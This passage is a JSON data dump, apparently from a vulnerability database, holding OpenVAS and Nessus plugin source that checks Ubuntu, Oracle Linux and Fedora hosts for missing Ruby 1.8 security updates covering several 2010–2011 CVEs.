+0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 11:20:13 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2010-0541\", \"CVE-2011-0188\", \"CVE-2011-1004\", \"CVE-2011-1005\",\n \"CVE-2011-2686\", \"CVE-2011-2705\", \"CVE-2011-4815\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1377-1\");\n script_name(\"Ubuntu Update for ruby1.8 USN-1377-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.10|10\\.04 LTS|11\\.04)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1377-1\");\n script_tag(name:\"affected\", value:\"ruby1.8 on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Drew Yao discovered that the WEBrick HTTP server was vulnerable to cross-site\n scripting attacks when displaying error pages. A remote attacker could use this\n flaw to run arbitrary web script. (CVE-2010-0541)\n\n Drew Yao discovered that Ruby's BigDecimal module did not properly allocate\n memory on 64-bit platforms. An attacker could use this flaw to cause a denial\n of service or possibly execute arbitrary code with user privileges.\n (CVE-2011-0188)\n\n Nicholas Jefferson discovered that the FileUtils.remove_entry_secure method in\n Ruby did not properly remove non-empty directories. An attacker could use this\n flaw to possibly delete arbitrary files. (CVE-2011-1004)\n\n It was discovered that Ruby incorrectly allowed untainted strings to be\n modified in protective safe levels. An attacker could use this flaw to bypass\n intended access restrictions. (CVE-2011-1005)\n\n Eric Wong discovered that Ruby does not properly reseed its pseudorandom number\n generator when creating child processes. An attacker could use this flaw to\n gain knowledge of the random numbers used in other Ruby child processes.\n (CVE-2011-2686)\n\n Eric Wong discovered that the SecureRandom module in Ruby did not properly seed\n its pseudorandom number generator. An attacker could use this flaw to gain\n knowledge of the random numbers used by another Ruby process with the same\n process ID number. (CVE-2011-2705)\n\n Alexander Klink and Julian Walde discovered that Ruby computed hash values\n without restricting the ability to trigger hash collisions predictably. A\n remote attacker could cause a denial of service by crafting values used in hash\n tables. (CVE-2011-4815)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.7.299-2ubuntu0.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.7.299-2ubuntu0.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.7.249-2ubuntu0.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.7.249-2ubuntu0.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.7.302-2ubuntu0.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.7.302-2ubuntu0.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-12-04T11:20:19", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1377-1", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for ruby1.8 USN-1377-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0188", "CVE-2011-2705", "CVE-2011-2686", "CVE-2011-1005", "CVE-2011-1004", "CVE-2010-0541", "CVE-2011-4815"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840923", "href": "http://plugins.openvas.org/nasl.php?oid=840923", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1377_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for ruby1.8 USN-1377-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Drew Yao discovered that the WEBrick HTTP server was vulnerable to cross-site\n scripting attacks when displaying error pages. A remote attacker could use this\n flaw to run arbitrary web script. (CVE-2010-0541)\n\n Drew Yao discovered that Ruby's BigDecimal module did not properly allocate\n memory on 64-bit platforms. An attacker could use this flaw to cause a denial\n of service or possibly execute arbitrary code with user privileges.\n (CVE-2011-0188)\n\n Nicholas Jefferson discovered that the FileUtils.remove_entry_secure method in\n Ruby did not properly remove non-empty directories. An attacker could use this\n flaw to possibly delete arbitrary files. (CVE-2011-1004)\n\n It was discovered that Ruby incorrectly allowed untainted strings to be\n modified in protective safe levels. An attacker could use this flaw to bypass\n intended access restrictions. (CVE-2011-1005)\n\n Eric Wong discovered that Ruby does not properly reseed its pseudorandom number\n generator when creating child processes. An attacker could use this flaw to\n gain knowledge of the random numbers used in other Ruby child processes.\n (CVE-2011-2686)\n\n Eric Wong discovered that the SecureRandom module in Ruby did not properly seed\n its pseudorandom number generator. An attacker could use this flaw to gain\n knowledge of the random numbers used by another Ruby process with the same\n process ID number. (CVE-2011-2705)\n\n Alexander Klink and Julian W&#228;lde discovered that Ruby computed hash values\n without restricting the ability to trigger hash collisions predictably. A\n remote attacker could cause a denial of service by crafting values used in hash\n tables. (CVE-2011-4815)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1377-1\";\ntag_affected = \"ruby1.8 on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1377-1/\");\n script_id(840923);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 11:20:13 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2010-0541\", \"CVE-2011-0188\", \"CVE-2011-1004\", \"CVE-2011-1005\",\n \"CVE-2011-2686\", \"CVE-2011-2705\", \"CVE-2011-4815\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1377-1\");\n script_name(\"Ubuntu Update for ruby1.8 USN-1377-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.7.299-2ubuntu0.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.7.299-2ubuntu0.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.7.249-2ubuntu0.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.7.249-2ubuntu0.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.7.302-2ubuntu0.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.7.302-2ubuntu0.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:02", "description": "Oracle Linux Local Security Checks ELSA-2011-1581", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-1581", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-3009"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122037", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122037", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1581.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122037\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:02 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1581\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1581 - ruby security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1581\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1581.html\");\n script_cve_id(\"CVE-2011-2705\", \"CVE-2011-3009\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.7.352~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.7.352~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.7.352~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.7.352~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.7.352~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.7.352~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-static\", rpm:\"ruby-static~1.8.7.352~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.7.352~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-13T00:00:00", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2011-17551", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2011-4815"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863681", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863681", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ruby FEDORA-2011-17551\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071794.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863681\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-13 10:42:39 +0530 (Fri, 13 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-17551\");\n script_cve_id(\"CVE-2011-4815\", \"CVE-2011-2686\");\n script_name(\"Fedora Update for ruby FEDORA-2011-17551\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"ruby on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.357~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2018-01-06T13:06:39", "description": "Check for the Version of ruby", "cvss3": {}, "published": "2012-01-13T00:00:00", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2011-17551", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2011-4815"], "modified": "2018-01-04T00:00:00", "id": "OPENVAS:863681", "href": "http://plugins.openvas.org/nasl.php?oid=863681", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ruby FEDORA-2011-17551\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"ruby on Fedora 15\";\ntag_insight = \"Ruby is the interpreted scripting language for quick and easy\n object-oriented programming. It has many features to process text\n files and to do system management tasks (as in Perl). It is simple,\n straight-forward, and extensible.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071794.html\");\n script_id(863681);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-13 10:42:39 +0530 (Fri, 13 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-17551\");\n script_cve_id(\"CVE-2011-4815\", \"CVE-2011-2686\");\n script_name(\"Fedora Update for ruby FEDORA-2011-17551\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.357~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-08-19T13:00:07", "description": "New version 1.8.7p352 is released, fixing randomization process in forked process (CVE-2011-2686). Also ruby path is fixed to have no duplicate directories on all archs.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-07-26T00:00:00", "type": "nessus", "title": "Fedora 14 : ruby-1.8.7.352-1.fc14 (2011-9374)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2011-2705"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:ruby", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-9374.NASL", "href": "https://www.tenable.com/plugins/nessus/55678", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-9374.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55678);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-2705\");\n script_xref(name:\"FEDORA\", value:\"2011-9374\");\n\n script_name(english:\"Fedora 14 : ruby-1.8.7.352-1.fc14 (2011-9374)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New version 1.8.7p352 is released, fixing randomization process in\nforked process (CVE-2011-2686). Also ruby path is fixed to have no\nduplicate directories on all archs.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=722415\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-July/063062.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?205c2490\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"ruby-1.8.7.352-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T13:00:08", "description": "New version 1.8.7p352 is released, fixing randomization process in forked process (CVE-2011-2686). Also ruby path is fixed to have no duplicate directories on all archs.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-07-26T00:00:00", "type": "nessus", "title": "Fedora 15 : ruby-1.8.7.352-1.fc15 (2011-9359)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2011-2705"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:ruby", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-9359.NASL", "href": "https://www.tenable.com/plugins/nessus/55677", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-9359.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55677);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-2705\");\n script_xref(name:\"FEDORA\", value:\"2011-9359\");\n\n script_name(english:\"Fedora 15 : ruby-1.8.7.352-1.fc15 (2011-9359)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New version 1.8.7p352 is released, fixing randomization process in\nforked process (CVE-2011-2686). Also ruby path is fixed to have no\nduplicate directories on all archs.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=722415\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-July/063071.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?25e2b5e9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n 